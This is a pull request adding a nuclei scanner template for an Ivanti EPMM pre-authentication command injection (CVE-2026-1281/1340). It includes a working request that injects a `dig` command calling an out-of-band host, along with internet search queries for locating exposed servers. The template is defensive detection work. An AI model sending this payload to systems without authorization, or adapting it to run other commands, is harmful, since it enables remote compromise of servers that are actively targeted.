### PR TITLE
Add CVE-2026-1281: Ivanti EPMM Pre-Auth RCE via Appstore Endpoint

### DIFF
--- a/http/cves/2026/CVE-2026-1281.yaml
+++ b/http/cves/2026/CVE-2026-1281.yaml
@@ -1,0 +1,49 @@
+id: CVE-2026-1281
+
+info:
+  name: Ivanti EPMM < 12.5.0.1 - Pre-Auth RCE via Appstore Endpoint
+  author: optimus-fulcria
+  severity: critical
+  description: |
+    Ivanti Endpoint Manager Mobile (EPMM) versions prior to 12.5.0.1 contain OS command injection vulnerabilities that allow unauthenticated remote attackers to execute arbitrary commands via Bash arithmetic expansion in URL path parameters. This template covers both CVE-2026-1281 (appstore endpoint at /mifs/c/appstore/) and the related CVE-2026-1340 (aftstore endpoint). Both share the same root cause and are fixed in version 12.5.0.1.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary OS commands on the underlying server, leading to complete system compromise.
+  remediation: |
+    Update Ivanti Endpoint Manager Mobile to version 12.5.0.1 or later.
+  reference:
+    - https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/
+    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1281
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1340
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id:
+      - CVE-2026-1281
+      - CVE-2026-1340
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.favicon.hash:"362091310"
+    fofa-query: icon_hash="362091310"
+    product: endpoint_manager_mobile
+    vendor: ivanti
+  tags: cve,cve2026,ivanti,epmm,rce,oast,kev
+
+http:
+  - raw:
+      - |
+        GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et={{unix_time()}},h=gPath%5B%60dig%20{{interactsh-url}}%20>%20/dev/null%60%5D/{{randstr}}.ipa HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - dns
+
+      - type: status
+        status:
+          - 404


### PR DESCRIPTION
## Description

Adds nuclei template for CVE-2026-1281 and CVE-2026-1340 - Ivanti Endpoint Manager Mobile (EPMM) pre-authentication remote code execution via OS command injection in the appstore endpoint.

**CISA KEV**: This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and is actively exploited in the wild.

- **Product**: Ivanti EPMM < 12.5.0.1
- **Type**: Unauthenticated RCE (OS Command Injection via Bash arithmetic expansion)
- **CVSS**: 9.8 Critical
- **CWE**: CWE-78
- **Detection**: OOB-based (interactsh) - sends crafted URL path that triggers DNS callback via `dig` command injection

## References
- https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/
- https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340
- https://nvd.nist.gov/vuln/detail/CVE-2026-1281